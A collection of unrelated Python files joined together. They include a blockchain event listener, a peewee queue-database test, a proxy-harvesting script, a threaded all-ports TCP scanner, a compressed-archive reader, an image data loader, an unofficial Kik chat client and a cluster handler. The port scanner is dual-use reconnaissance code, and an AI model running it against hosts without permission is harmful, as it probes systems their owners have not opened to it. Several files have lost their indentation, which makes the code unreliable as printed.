        confirmations (int): Number of confirmation blocks to wait before an event is considered final.
"""
def __init__(self, root_chain, w3=Web3(HTTPProvider('http://localhost:8545')), confirmations=6):
self.root_chain = root_chain
self.w3 = w3
self.confirmations = confirmations
self.seen_events = {}
self.active_events = {}
self.subscribers = {}
self.__listen_for_event('Deposit')
self.__listen_for_event('ExitStarted')
self.__listen_for_event('MsgSender')
self.__listen_for_event('FinalState')
self.__listen_for_event('forDebug01')
def on(self, event_name, event_handler):
"""Registers an event handler to an event by name.
Event handlers are passed the Web3 Event dict.
Args:
event_name (str): Name of the event to listen to.
event_handler (function): A function to call when the event is caught.
"""
self.subscribers[event_name].append(event_handler)
def __listen_for_event(self, event_name):
"""Registers an event as being watched for and starts a filter loop.
Args:
event_name (str): Name of the event to watch for.
"""
self.subscribers[event_name] = []
self.active_events[event_name] = True
threading.Thread(target=self.filter_loop, args=(event_name,)).start()
def stop_listening_for_event(self, event_name):
"""Stops watching for a certain event.
Args:
event_name (str): Name of event to deregister.
"""
del self.active_events[event_name]
def stop_all(self):
"""Stops watching for all events
"""
for event in list(self.active_events):
self.stop_listening_for_event(event)
def filter_loop(self, event_name):
"""Starts a filter loop to broadcast events.
Note that we only watch for events that occur between
`confirmations` and `confirmations * 2`. This is important because
we never want a client to act on an event that isn't
finalized. We might catch the same event twice, so we hash
each event and make sure we haven't seen that event yet before
        broadcasting it.
Args:
event_name (str): Name of event to watch.
"""
while event_name in self.active_events:
current_block = self.w3.eth.getBlock('latest')
event_filter = self.root_chain.eventFilter(event_name, {
'fromBlock': current_block['number'] - (self.confirmations * 2 + 1),
'toBlock': current_block['number'] + 1 - self.confirmations
})
for event in event_filter.get_all_entries():
event_hash = self.__hash_event(event)
if event_hash not in self.seen_events:
self.seen_events[event_hash] = True
self.broadcast_event(event_name, event)
time.sleep(random.random())
def broadcast_event(self, event_name, event):
"""Broadcasts an event to all subscribers.
Args:
event_name (str): Name of event to broadcast.
event (dict): Event data to broadcast.
"""
for subscriber in self.subscribers[event_name]:
subscriber(event)
def __hash_event(self, event):
"""Returns the sha256 hash of an event dict.
Args:
event (dict): Event dict to hash.
Returns:
str: Hexadecimal hash string.
"""
# HACK: Be able to JSON serialize the AttributeDict/HexBytes objects https://github.com/ethereum/web3.py/issues/782
class CustomJsonEncoder(json.JSONEncoder):
def default(self, obj): # pylint: disable=E0202
if isinstance(obj, AttributeDict):
return obj.__dict__
if isinstance(obj, HexBytes):
return obj.hex()
return super().default(obj)
#stringified_event = json.dumps(dict(event), sort_keys=True, cls=CustomJsonEncoder)
stringified_event = pickle.dumps(event)
#return sha256(stringified_event.encode()).hexdigest()
return sha256(stringified_event).hexdigest()
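# Illustrative arithmetic for the finality window used in filter_loop() above
# (plain numbers only, no web3 calls). With confirmations=6 and the chain at
# block 100, the filter scans blocks 87 through 95: events that are at least
# `confirmations` blocks deep but not older than roughly twice that.
def _finality_window(latest_block, confirmations):
    from_block = latest_block - (confirmations * 2 + 1)
    to_block = latest_block + 1 - confirmations
    return from_block, to_block

# _finality_window(100, 6) -> (87, 95)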
|
test_sqliteq.py
|
from functools import partial
import os
import sys
import threading
import time
import unittest
try:
import gevent
from gevent.event import Event as GreenEvent
except ImportError:
gevent = None
from peewee import *
from playhouse.sqliteq import ResultTimeout
from playhouse.sqliteq import SqliteQueueDatabase
from playhouse.sqliteq import WriterPaused
from playhouse.tests.base import database_initializer
from playhouse.tests.base import PeeweeTestCase
from playhouse.tests.base import skip_if
get_db = partial(
database_initializer.get_database,
'sqlite',
db_class=SqliteQueueDatabase)
db = database_initializer.get_database('sqlite')
class User(Model):
name = TextField(unique=True)
class Meta:
database = db
db_table = 'threaded_db_test_user'
class BaseTestQueueDatabase(object):
database_config = {}
n_rows = 50
n_threads = 20
def setUp(self):
super(BaseTestQueueDatabase, self).setUp()
with db.execution_context():
User.create_table(True)
User._meta.database = \
self.db = get_db(**self.database_config)
# Sanity check at startup.
self.assertEqual(self.db.queue_size(), 0)
def tearDown(self):
super(BaseTestQueueDatabase, self).tearDown()
User._meta.database = db
with db.execution_context():
User.drop_table()
if not self.db.is_closed():
self.db.close()
if not db.is_closed():
db.close()
filename = db.database
if os.path.exists(filename):
os.unlink(filename)
def test_query_error(self):
self.db.start()
curs = self.db.execute_sql('foo bar baz')
self.assertRaises(OperationalError, curs.fetchone)
self.db.stop()
def test_query_execution(self):
qr = User.select().execute()
self.assertEqual(self.db.queue_size(), 0)
self.db.start()
users = list(qr)
huey = User.create(name='huey')
mickey = User.create(name='mickey')
self.assertTrue(huey.id is not None)
self.assertTrue(mickey.id is not None)
self.assertEqual(self.db.queue_size(), 0)
self.db.stop()
def create_thread(self, fn, *args):
raise NotImplementedError
def create_event(self):
raise NotImplementedError
def test_multiple_threads(self):
def create_rows(idx, nrows):
for i in range(idx, idx + nrows):
User.create(name='u-%s' % i)
total = self.n_threads * self.n_rows
self.db.start()
threads = [self.create_thread(create_rows, i, self.n_rows)
for i in range(0, total, self.n_rows)]
[t.start() for t in threads]
[t.join() for t in threads]
self.assertEqual(User.select().count(), total)
self.db.stop()
def test_pause(self):
event_a = self.create_event()
event_b = self.create_event()
def create_user(name, event, expect_paused):
event.wait()
if expect_paused:
self.assertRaises(WriterPaused, lambda: User.create(name=name))
else:
User.create(name=name)
self.db.start()
t_a = self.create_thread(create_user, 'a', event_a, True)
t_a.start()
t_b = self.create_thread(create_user, 'b', event_b, False)
t_b.start()
User.create(name='c')
self.assertEqual(User.select().count(), 1)
# Pause operations but preserve the writer thread/connection.
self.db.pause()
event_a.set()
self.assertEqual(User.select().count(), 1)
t_a.join()
self.db.unpause()
self.assertEqual(User.select().count(), 1)
event_b.set()
t_b.join()
self.assertEqual(User.select().count(), 2)
self.db.stop()
def test_restart(self):
self.db.start()
User.create(name='a')
self.db.stop()
self.db._results_timeout = 0.0001
self.assertRaises(ResultTimeout, User.create, name='b')
self.assertEqual(User.select().count(), 1)
self.db.start() # Will execute the pending "b" INSERT.
self.db._results_timeout = None
User.create(name='c')
self.assertEqual(User.select().count(), 3)
self.assertEqual(sorted(u.name for u in User.select()),
['a', 'b', 'c'])
def test_waiting(self):
D = {}
def create_user(name):
D[name] = User.create(name=name).id
threads = [self.create_thread(create_user, name)
for name in ('huey', 'charlie', 'zaizee')]
[t.start() for t in threads]
def get_users():
D['users'] = [(user.id, user.name) for user in User.select()]
tg = self.create_thread(get_users)
tg.start()
threads.append(tg)
self.db.start()
[t.join() for t in threads]
self.db.stop()
self.assertEqual(sorted(D), ['charlie', 'huey', 'users', 'zaizee'])
def test_next_method(self):
self.db.start()
User.create(name='mickey')
User.create(name='huey')
query = iter(User.select().order_by(User.name))
self.assertEqual(next(query).name, 'huey')
self.assertEqual(next(query).name, 'mickey')
self.assertRaises(StopIteration, lambda: next(query))
self.assertEqual(
next(self.db.execute_sql('PRAGMA journal_mode'))[0],
'wal')
self.db.stop()
class TestThreadedDatabaseThreads(BaseTestQueueDatabase, PeeweeTestCase):
database_config = {'use_gevent': False}
def tearDown(self):
self.db._results_timeout = None
super(TestThreadedDatabaseThreads, self).tearDown()
def create_thread(self, fn, *args):
t = threading.Thread(target=fn, args=args)
t.daemon = True
return t
def create_event(self):
return threading.Event()
def test_timeout(self):
@self.db.func()
def slow(n):
time.sleep(n)
return 'I slept for %s seconds' % n
self.db.start()
# Make the result timeout very small, then call our function which
# will cause the query results to time-out.
self.db._results_timeout = 0.001
self.assertRaises(
ResultTimeout,
lambda: self.db.execute_sql('select slow(?)', (0.005,)).fetchone())
self.db.stop()
@skip_if(lambda: gevent is None)
class TestThreadedDatabaseGreenlets(BaseTestQueueDatabase, PeeweeTestCase):
database_config = {'use_gevent': True}
n_rows = 20
n_threads = 200
def create_thread(self, fn, *args):
return gevent.Greenlet(fn, *args)
def create_event(self):
return GreenEvent()
if __name__ == '__main__':
unittest.main(argv=sys.argv)
|
Grab_proxy_xundaili_zh.py
|
import requests
import json
import time
from threading import Thread
from .RedisClient import RedisClient
from logconfig import LogConfig
import logging
from logging.config import dictConfig
config = LogConfig(info_file=r'grabInfo.log', err_file=r'grabErr.log').log_config
logging.config.dictConfig(config)
info_logger = logging.getLogger("info_log")
err_logger = logging.getLogger("err_log")
def connect_check(proxies):
ping_url = 'http://www.baidu.com'
try:
status_code = requests.get(ping_url, proxies=proxies, timeout=3).status_code
if status_code == 200:
return True
else:
return False
except Exception as e:
print(e)
return False
def store_proxies(proxies):
conn = RedisClient(name='certificate_proxies')
now = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
conn_check = connect_check(proxies)
if conn_check:
proxies = json.dumps(proxies)
duplicate_check = conn.exist(proxies)
if not duplicate_check:
conn.set(proxies, 1)
print('NNNNN: ', proxies)
info_logger.info(str(now) + ' New proxies: ' + str(proxies))
else:
info_logger.info(str(now) + ' Already exist proxies: ' + str(proxies))
else:
err_logger.error(str(now) + ' Can not connect baidu.com -- proxies: ' + str(proxies))
def download_proxies():
url = 'http://www.xdaili.cn/ipagent/privateProxy/applyStaticProxy' \
'?count=1&spiderId=fd4708592c97444c9f42060c500649ac&returnType=2'
content = requests.get(url).json()
error_code = content.get('ERRORCODE', '')
if error_code in ['10055', '10036', '10038']:
now = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
        err_logger.error(str(now) + ' Extraction too frequent; please follow the required request rate!')
time.sleep(15)
return []
print('xundaili resp content: ', content)
proxies_list = []
for proxy in content['RESULT']:
ip = proxy['ip']
port = proxy['port']
proxies = {
'http': 'http://%s:%s' % (ip, port),
'https': 'http://%s:%s' % (ip, port),
}
proxies_list.append(proxies)
return proxies_list
def main():
while True:
try:
begin = time.time()
proxies_list = download_proxies()
total = len(proxies_list)
for i in range(total):
proxies = proxies_list[i]
t = Thread(target=store_proxies, args=(proxies, ))
t.start()
t.join()
end = time.time()
if end - begin > 15:
continue
else:
time.sleep(15.5-(end - begin))
except Exception as e:
now = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
err_logger.error(str(now) + str(e))
time.sleep(10)
if __name__ == '__main__':
main()
|
SimplePortScanner.py
|
import optparse
import socket
from socket import *
from threading import *
def connScan(Host, tgtPort):
try:
#initiates TCP connection
connSkt = socket(AF_INET, SOCK_STREAM)
connSkt.connect((Host, tgtPort))
print('[+] Port %d: Open' % (tgtPort))
connSkt.close()
except:
pass
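#alternative sketch (not used above): connect_ex() returns an error code
#instead of raising, which avoids the bare try/except around connect()
def connScanQuiet(host, port, timeout=1.0):
    s = socket(AF_INET, SOCK_STREAM)
    s.settimeout(timeout)
    is_open = (s.connect_ex((host, port)) == 0)
    s.close()
    return is_open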
def portScan(Host, tgtPorts):
try:
tgtIP = gethostbyname(Host)
except:
print("[-] Cannot resolve '%s': Unknown host" % (Host))
return
try:
tgtName = gethostbyaddr(tgtIP)
print('\n[+] Scan Results for : ' + tgtName[0])
except:
print('\n[+] Scan Results for : ' + tgtIP)
setdefaulttimeout(1)
#start a new thread when scanning for each port (makes port scan run a bit faster)
#calls connScan function
for tgtPort in tgtPorts:
t = Thread(target=connScan, args=(Host, int(tgtPort)))
t.start()
def main():
parser = optparse.OptionParser('usage %prog -H ' +\
'<target host> ')
parser.add_option('-H', dest='Host', type='string', \
help='specify target host')
(options, args) = parser.parse_args()
Host = options.Host
    #scans all ports (1-65535)
    tgtPorts = range(1, 65536)
#if there is no host option in cmdline
    if Host is None:
print(parser.usage)
exit(0)
portScan(Host, tgtPorts)
if __name__ == '__main__':
main()
|
__init__.py
|
import os
import zstandard
import ujson as json
import time
import tarfile
import codecs
from functools import reduce
import jsonlines
import io
from zipfile import ZipFile
import gzip
from math import ceil
import mmap
import multiprocessing as mp
def listdir_or_file(x):
if isinstance(x, list):
return reduce(lambda x,y:x+y, map(listdir_or_file, sorted(x)))
return [x] if os.path.isfile(x) else [x + '/' + fn for fn in sorted(os.listdir(x))]
def tarfile_reader(file, streaming=False):
# we need our own tarfile parser because `tarfile` doesn't work well for
# big tarfiles; it seems to be reading the entire file to get a list of
# where all the files are - but we don't need that because we just need
# to see each file once. surprisingly, `tarfile` doesn't expose any
# facilities for this. the only options are 1. load the entire tarfile
# and then query by filename or 2. extract to disk - and neither of
# these is what we want.
offset = 0
paxfilesize = None
while True:
hdr = file.read(512)
offset += 512
# https://www.gnu.org/software/tar/manual/html_node/Standard.html
# end at 135 not 136 because of \0 terminator
if hdr[124:135] == b'\0'*11:
# end of record
break
fname = hdr[:100].split(b'\0')[0]
# if the file is too big to fit in the size field, tarfiles will actually
# include a PaxHeader with the size in it, applicable to the immediate next file.
if paxfilesize is not None:
size = paxfilesize
paxfilesize = None
else:
size = int(hdr[124:135], 8)
padded_size = ceil(size / 512) * 512
# for handling PaxHeader files (which contain extra metadata about file size) and directories
# https://pubs.opengroup.org/onlinepubs/9699919799/utilities/pax.html#tag_20_92_13_03
type = chr(hdr[156])
if type == 'x':
meta = file.read(padded_size)[:size]
def kv(x):
return x.decode('utf-8').split(' ')[1].split('=')
paxfileattrs = {
kv(x)[0]: kv(x)[1]
for x in meta.split(b'\n') if x
}
paxfilesize = int(paxfileattrs['size'])
offset += padded_size
continue
elif type != '0' and type != '\0':
if streaming:
file.seek(padded_size, os.SEEK_CUR)
else:
file.read(padded_size)
offset += padded_size
continue
if streaming:
# skip directory entries
if size != 0:
mmo = mmap.mmap(file.fileno(), length=offset + size, access=mmap.ACCESS_READ)
mmo.seek(offset)
yield mmo
file.seek(padded_size, os.SEEK_CUR)
else:
yield file.read(padded_size)[:size]
offset += padded_size
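# A small standalone illustration (stdlib only, hypothetical file name) of the
# ustar header math relied on above: the size field is octal text at bytes
# 124-135 of each 512-byte header, and file data is padded out to the next
# 512-byte boundary. Not used by the reader itself.
def _tar_header_demo():
    data = b'hello world'
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode='w', format=tarfile.USTAR_FORMAT) as tf:
        info = tarfile.TarInfo(name='demo.txt')
        info.size = len(data)
        tf.addfile(info, io.BytesIO(data))
    hdr = buf.getvalue()[:512]
    size = int(hdr[124:135], 8)           # -> 11, parsed from the octal field
    padded_size = ceil(size / 512) * 512  # -> 512, next 512-byte boundary
    return size, padded_size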
def handle_jsonl(jsonl_reader, get_meta, autojoin_paragraphs, para_joiner, key='text'):
for ob in jsonl_reader:
# naive jsonl where each object is just the string itself, with no meta. For legacy compatibility.
if isinstance(ob, str):
assert not get_meta
yield ob
continue
text = ob[key]
if autojoin_paragraphs and isinstance(text, list):
text = para_joiner.join(text)
if get_meta:
yield text, (ob['meta'] if 'meta' in ob else {})
else:
yield text
class Reader:
def __init__(self, in_path):
self.in_path = in_path
def stream_data(self, get_meta=False, threaded=False):
if not threaded:
yield from self._stream_data(get_meta)
return
q = mp.Queue(1000)
p = mp.Process(target=self._stream_data_threaded, args=(q, get_meta))
p.start()
while p.is_alive():
res = q.get()
if res is None: break
yield res
def _stream_data_threaded(self, q, get_meta=False):
for data in self._stream_data(get_meta):
q.put(data)
q.put(None)
def _stream_data(self, get_meta=False, jsonl_key="text"):
self.f_name = ""
for f in listdir_or_file(self.in_path):
self.f_name = f
if f == 'openwebtext.tar.xz':
assert not get_meta
yield from self.read_owt(f)
elif 'urlsf_subset' in f and f.endswith('_data.xz'):
assert not get_meta
yield from self.read_owt_subset(f)
elif f.endswith('.dat.zst'):
assert not get_meta
yield from self.read_dat(f)
elif f.endswith('.jsonl.zst'):
                yield from self.read_jsonl(f, get_meta, key=jsonl_key)
elif f.endswith('.jsonl.zst.tar'):
                yield from self.read_jsonl_tar(f, get_meta, key=jsonl_key)
elif f.endswith('.json.zst'):
assert not get_meta
yield from self.read_json(f)
elif f.endswith('.txt'):
assert not get_meta
yield from self.read_txt(f)
elif f.endswith('.zip'):
assert not get_meta
yield from self.read_zip(f)
elif f.endswith('.tar.gz'):
assert not get_meta
yield from self.read_tgz(f)
def read_txt(self, file):
with open(file, 'r') as fh:
yield fh.read()
def read_zip(self, file):
archive = ZipFile(file, 'r')
for f in archive.namelist():
yield archive.read(f).decode('UTF-8')
def read_tgz(self, file):
gz = gzip.open(file)
yield from (x.decode('utf-8') for x in tarfile_reader(gz, streaming=False))
def read_json(self, file):
with open(file, 'rb') as fh:
cctx = zstandard.ZstdDecompressor()
reader = cctx.stream_reader(fh)
ob = json.load(reader)
yield from ob
def read_dat(self, file):
with open(file, 'rb') as fh:
cctx = zstandard.ZstdDecompressor()
reader = cctx.stream_reader(fh)
while True:
ln = reader.read(16).decode('UTF-8')
if not ln:
break
ln = int(ln)
yield reader.read(ln).decode('UTF-8')
def read_jsonl(self, file, get_meta=False, autojoin_paragraphs=True, para_joiner='\n\n', key='text'):
with open(file, 'rb') as fh:
cctx = zstandard.ZstdDecompressor()
reader = io.BufferedReader(cctx.stream_reader(fh))
rdr = jsonlines.Reader(reader)
yield from handle_jsonl(rdr, get_meta, autojoin_paragraphs, para_joiner, key)
def read_jsonl_tar(self, file, get_meta=False, autojoin_paragraphs=True, para_joiner='\n\n', key='text'):
with open(file, 'rb') as fh:
for f in tarfile_reader(fh, streaming=True):
cctx = zstandard.ZstdDecompressor()
reader = io.BufferedReader(cctx.stream_reader(f))
rdr = jsonlines.Reader(reader)
yield from handle_jsonl(rdr, get_meta, autojoin_paragraphs, para_joiner, key)
f.close()
def read_owt(self, file):
tar = tarfile.open(file, encoding='utf-8')
utf8reader = codecs.getreader('utf-8')
for name in tar.getmembers():
fp = tar.extractfile(name)
inner_tar = tarfile.open(fileobj=fp, encoding='utf-8')
for inner_name in inner_tar.getmembers():
inner_fp = utf8reader(inner_tar.extractfile(inner_name))
contents = inner_fp.read()
yield contents
def read_owt_subset(self, file):
utf8reader = codecs.getreader('utf-8')
tar = tarfile.open(file, encoding='utf-8')
for name in tar.getmembers():
fp = utf8reader(tar.extractfile(name))
contents = fp.read()
yield contents
class Archive:
def __init__(self, out_dir, compression_level=3):
self.out_dir = out_dir
os.makedirs(out_dir, exist_ok=True)
self.i = 0
self.fh = open(self.out_dir + '/current_chunk_incomplete', 'wb')
self.cctx = zstandard.ZstdCompressor(level=compression_level, threads=8)
self.compressor = self.cctx.stream_writer(self.fh)
def add_data(self, data, meta={}):
self.compressor.write(json.dumps({'text': data, 'meta': meta}).encode('UTF-8') + b'\n')
def commit(self, archive_name='default'):
fname = self.out_dir + '/data_' + str(self.i) + '_time' + str(int(time.time())) + '_' + archive_name + '.jsonl.zst'
self.compressor.flush(zstandard.FLUSH_FRAME)
self.fh.flush()
self.fh.close()
os.rename(self.out_dir + '/current_chunk_incomplete', fname)
self.fh = open(self.out_dir + '/current_chunk_incomplete', 'wb')
self.compressor = self.cctx.stream_writer(self.fh)
self.i += 1
class DatArchive:
def __init__(self, out_dir):
self.out_dir = out_dir
os.makedirs(out_dir, exist_ok=True)
self.data = []
self.i = 0
if os.path.exists(out_dir) and len(os.listdir(out_dir)) > 0:
self.i = max(map(lambda x: int(x.split('_')[1].split('.')[0]), os.listdir(out_dir))) + 1
def add_data(self, data):
self.data.append(data)
def commit(self, archive_name=None):
# TODO: streaming
cctx = zstandard.ZstdCompressor(level=3)
if archive_name is None:
archive_name = str(int(time.time()))
res = b''.join(map(lambda x: ("%016d" % len(x)).encode('UTF-8') + x, map(lambda x: x.encode('UTF-8'), self.data)))
cdata = cctx.compress(res)
with open(self.out_dir + '/data_' + str(self.i) + '_' + archive_name + '.dat.zst', 'wb') as fh:
fh.write(cdata)
self.i += 1
self.data = []
class JSONArchive:
def __init__(self, out_dir):
self.out_dir = out_dir
os.makedirs(out_dir, exist_ok=True)
self.data = []
self.i = 0
if os.path.exists(out_dir) and len(os.listdir(out_dir)) > 0:
self.i = max(map(lambda x: int(x.split('_')[1].split('.')[0]), os.listdir(out_dir))) + 1
def add_data(self, data):
self.data.append(data)
def commit(self):
cctx = zstandard.ZstdCompressor(level=3)
cdata = cctx.compress(json.dumps(self.data).encode('UTF-8'))
with open(self.out_dir + '/data_' + str(self.i) + '_' + str(int(time.time())) + '.json.zst', 'wb') as fh:
fh.write(cdata)
self.i += 1
self.data = []
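# A minimal, hypothetical round-trip sketch of the classes above (the output
# directory name is made up): write a couple of documents with Archive, then
# stream them back with Reader.
if __name__ == '__main__':
    ar = Archive('example_output')
    ar.add_data('first document', meta={'source': 'demo'})
    ar.add_data('second document')
    ar.commit(archive_name='demo')
    for text, meta in Reader('example_output').stream_data(get_meta=True):
        print(len(text), meta)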
|
DataLoader1_ReadAll.py
|
from DataLoader.Helper.Helper_Global2Local import Global2Local
import threading
from Common.CommonClasses import *
from DataLoader.DataLoader0_ReadAnns import DataLoader0_ReadAnns
from DataLoader.DataVis import *
from DataLoader.Helper.Helper_TargetUnpacker import *
from Common.Calculation import Calculation
import time
class DataLoader1_ReadAll():
def __init__(self, start=0, N=1000):
self.beginAt = start
        self.totalN = N  # self.anns.N
self.initHelper()
def initHelper(self):
self.anns = DataLoader0_ReadAnns()
self.conv_g2l = Global2Local()
self.dataLabel = np.zeros(
(self.totalN, GridParams().numGridX, GridParams().numGridY, GridParams().numBBox, GridParams().dimFeat),
dtype=float)
self.imgList = np.zeros((self.totalN, 448, 448, 3), dtype=float)
def getDataLabelFromTo(self, start, partN):
end, N = getEnd(start, partN, self.totalN)
for i in range(start, end):
img, objIds, isMoreThanOneObjPerGrid, counter, label = self.anns.getTargetAt(i + self.beginAt)
self.imgList[i] = img
self.dataLabel[i,:] = label
# if np.mod(i, 100) == 0:
# print(i)
print("Done Reading imgs from %d to %d" %(start, end))
def getDataLable(self):
print("Allocating threads to read imgs")
partN = 500
#nThread = int(self.anns.N/partN) + 1
nThread = getNumThread(self.totalN, partN)
#print(nThread)
threads=[]
for i in range(0, nThread):
start = i*partN
threads.append(threading.Thread(target=self.getDataLabelFromTo, args=(start, partN)))
threads[i].start()
#print(i)
for thread in threads:
thread.join()
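# Illustrative sketch (plain Python) of the chunking getDataLable() relies on:
# the total range is split into fixed-size parts and each part is handled by
# one thread. The real getEnd/getNumThread helpers come from a star import
# above, so their behaviour is only approximated here.
def _chunk_ranges(total, part):
    # e.g. _chunk_ranges(1000, 300) -> [(0, 300), (300, 600), (600, 900), (900, 1000)]
    return [(start, min(start + part, total)) for start in range(0, total, part)]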
if __name__ == '__main__':
r = DataLoader0_ReadAnns()
visG = Visualizer_Global()
unpacker = TargetUnpacker()
c = Calculation()
reader = DataLoader1_ReadAll(1000, 1000)
s = time.time()
reader.getDataLable()
print(time.time() - s)
index = 150
img = reader.imgList[index].copy()
label = reader.dataLabel[index]
objIds, offset, bb = unpacker.unpackLabel(label)
print(label.shape)
fakebbs = np.ones_like(bb) * 5 + bb
iou = c.getIOU(fakebbs, bb)
img = visG.drawBBox(img, fakebbs, YOLOObjects().getNamesFromObjIds(objIds))
img = visG.drawBBox(img, bb, YOLOObjects().getNamesFromObjIds(objIds))
visG.showImg(img)
|
photon_client.py
|
#!/usr/bin/env python3
import logging
import sys
import threading
import time
import os
from kik_unofficial.datatypes.peers import Group, User
from kik_unofficial.client import KikClient
from kik_unofficial.callbacks import KikClientCallback
from kik_unofficial.datatypes.xmpp.chatting import IncomingChatMessage, IncomingGroupChatMessage, \
IncomingStatusResponse, IncomingGroupStatus
from kik_unofficial.datatypes.xmpp.roster import FetchRosterResponse, PeersInfoResponse
from kik_unofficial.datatypes.xmpp.login import ConnectionFailedResponse
username = sys.argv[1] if len(sys.argv) > 1 else input('Username: ')
password = sys.argv[2] if len(sys.argv) > 2 else input('Password: ')
friends = {}
users = {}
groups = []
dms = []
peer_jid = "0"
focus = False
class InteractiveChatClient(KikClientCallback):
def on_authenticated(self):
cli_thread = threading.Thread(target=chat)
cli_thread.start()
def on_roster_received(self, response: FetchRosterResponse):
print("Roster refreshed")
for peer in response.peers:
friends[peer.jid] = peer
for m in response.peers:
if isinstance(m, Group):
groups.append(str(m))
if isinstance(m, User):
dms.append(str(m))
def on_chat_message_received(self, chat_message: IncomingChatMessage):
print("[DM] {}: {}".format(jid_to_dm_username(chat_message.from_jid), chat_message.body))
"""client.send_chat_message(chat_message.from_jid,"hello")"""
time.sleep(1)
def on_group_message_received(self, chat_message: IncomingGroupChatMessage):
global peer_jid, focus
if chat_message.group_jid == peer_jid or focus is False:
try:
print("-------\n[GROUP]jid:{} - {}:\n{}: {}".format(get_group_jid_number(chat_message.group_jid),
friends[chat_message.group_jid].name,
jid_to_group_display_name(chat_message.from_jid),
chat_message.body))
except:
print(
"XXXXXXXXXXXXX\n[WARNING]UH OH, WE GOT A MESSAGE FROM A GROUP NOT IN THE ROSTER, UNLESS THE PROGRAM IS STARTING RUN /refresh\nXXXXXXXXXXXXX")
print("-------\n[GROUP]jid:{} - {}:\n{}: {}".format(get_group_jid_number(chat_message.group_jid),
"UNKNOWN GROUP",
jid_to_group_display_name(chat_message.from_jid),
chat_message.body))
        else:
            # print("suppressed message from group ({}) {}".format(get_group_jid_number(chat_message.group_jid), friends[chat_message.group_jid].name))
            pass
def on_connection_failed(self, response: ConnectionFailedResponse):
print("Connection failed")
def on_status_message_received(self, response: IncomingStatusResponse):
print(response.status)
client.add_friend(response.from_jid)
def on_group_status_received(self, response: IncomingGroupStatus):
client.request_info_of_users(response.status_jid)
if response.status.find("has joined") > 0:
print("-------\n[JOIN]({}){} has joined the group ({})".format(response.status_jid,
jid_to_group_display_name(response.status_jid),
get_group_jid_number(response.group_jid)))
if response.status.find("has left") > 0:
print("-------\n[LEAVE]({}){} has left the group ({})".format(response.status_jid,
jid_to_group_display_name(response.status_jid),
get_group_jid_number(response.group_jid)))
def on_peer_info_received(self, response: PeersInfoResponse):
users[response.users[0].jid] = response.users[0]
def jid_to_dm_username(jid):
return jid.split('@')[0][0:-4]
def query_user(jid):
if jid in users:
return users[jid]
else:
client.request_info_of_users(jid)
        while jid not in users:
            time.sleep(0.1)
return users[jid]
def jid_to_group_display_name(jid):
return query_user(jid).display_name
def get_group_jid_number(jid):
return jid.split('@')[0][0:-2]
def chat():
global peer_jid, focus
print("Refreshing roster")
client.request_roster()
help_str = ("-Usage-\n\n" +
"/help - displays this message\n" +
"/connect [first letters of username/group jid] - Chat with peer\n" +
"/refresh - refreshes roster (if anyone has friended / added you to a group)\n" +
"/dms - list all dms you have open\n" +
"/groups - list all groups you have open\n" +
"/pic \"path to file.png\" - send a pic\n" +
"/focus - this makes only messages from the group your connected to appear\n" +
"/peer - list the peer you are currently connected to\n" +
"Type a line to send a message.\n")
print(help_str)
while True:
message = input()
if message.startswith('/'):
if message.startswith('/connect '):
for jid in friends:
if jid.startswith(message[9:]):
print("Chatting with {}".format(get_group_jid_number(jid)))
peer_jid = jid
break
elif message.startswith('/refresh'):
print("Refreshing roster")
client.request_roster()
elif message.startswith("/pic "):
client.send_chat_image(peer_jid, message[6:-1])
elif message.startswith("/focus"):
focus = not focus
print("focus: " + str(focus))
elif message.startswith("/peer"):
print(peer_jid)
elif message.startswith("/help"):
print(help_str)
elif message.startswith("/dms"):
print("-DMS-\n{}".format("\n".join([m for m in dms])))
elif message.startswith("/groups"):
groups_str = "-GROUPS-"
for g in groups:
groups_str += "\n[GROUP]jid:" + g.split("_")[0][10:] + " - " + g.split("name=")[1].split(", code=")[
0]
print(groups_str)
else:
if peer_jid != "0" and message:
client.send_chat_message(peer_jid, message)
elif message is None:
pass
else:
print("you need to connect to someone first, use /connect [name/jid]")
if __name__ == '__main__':
# set up logging
logger = logging.getLogger()
logger.setLevel(logging.INFO)
stream_handler = logging.FileHandler(os.path.dirname(__file__) + '/' + str(int(time.time() * 1000.0)) + '.log')
stream_handler.setFormatter(logging.Formatter(KikClient.log_format()))
logger.addHandler(stream_handler)
# create the client
callback = InteractiveChatClient()
client = KikClient(callback=callback, kik_username=username, kik_password=password)
    while True: time.sleep(1)  # keep the main thread alive while the client runs in the background
|
multiprocTest.py
|
from time import sleep
def TestFunction( test1, test2 ):
print( 'these are the props', test1, test2)
while True:
print( 'we are looping' )
sleep(1)
return
if __name__ == "__main__":
import multiprocessing
    proc = multiprocessing.Process(target=TestFunction, args=({'test': 1}, {'test2': 2}))
proc.name = 'proc 1'
proc.start()
sleep(5)
print( proc.name)
# Terminate the process
proc.terminate() # sends a SIGTERM
while True:
try:
var = input(""" What do you want to do?: """
)
print( var )
            if var == 'q':
                # the worker process was already terminated above, so just exit the loop
                break
except KeyboardInterrupt:
break
print( 'finished')
|
cluster.py
|
# Copyright IBM Corp, All Rights Reserved.
#
# SPDX-License-Identifier: Apache-2.0
#
import datetime
import logging
import os
import sys
import time
import copy
from threading import Thread
import requests
from pymongo.collection import ReturnDocument
sys.path.append(os.path.join(os.path.dirname(__file__), '..', '..'))
from agent import get_swarm_node_ip
from common import db, log_handler, LOG_LEVEL
from common import CLUSTER_PORT_START, CLUSTER_PORT_STEP, \
NETWORK_TYPE_FABRIC_PRE_V1, NETWORK_TYPE_FABRIC_V1, \
CONSENSUS_PLUGINS_FABRIC_V1, CONSENSUS_MODES, \
WORKER_TYPES, WORKER_TYPE_DOCKER, WORKER_TYPE_SWARM, WORKER_TYPE_K8S, \
SYS_CREATOR, SYS_DELETER, SYS_USER, SYS_RESETTING, \
NETWORK_SIZE_FABRIC_PRE_V1, \
PEER_SERVICE_PORTS, CA_SERVICE_PORTS
from common import FabricPreNetworkConfig, FabricV1NetworkConfig
from modules import host
from agent import ClusterOnDocker
logger = logging.getLogger(__name__)
logger.setLevel(LOG_LEVEL)
logger.addHandler(log_handler)
class ClusterHandler(object):
""" Main handler to operate the cluster in pool
"""
def __init__(self):
self.col_active = db["cluster_active"]
self.col_released = db["cluster_released"]
self.host_handler = host.host_handler
self.cluster_agents = {
'docker': ClusterOnDocker(),
'swarm': ClusterOnDocker()
}
def list(self, filter_data={}, col_name="active"):
""" List clusters with given criteria
:param filter_data: Image with the filter properties
